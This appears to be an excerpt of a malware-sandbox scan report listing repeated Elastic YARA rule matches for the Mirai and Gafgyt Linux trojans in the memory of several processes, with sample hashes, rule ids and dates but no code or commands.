Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
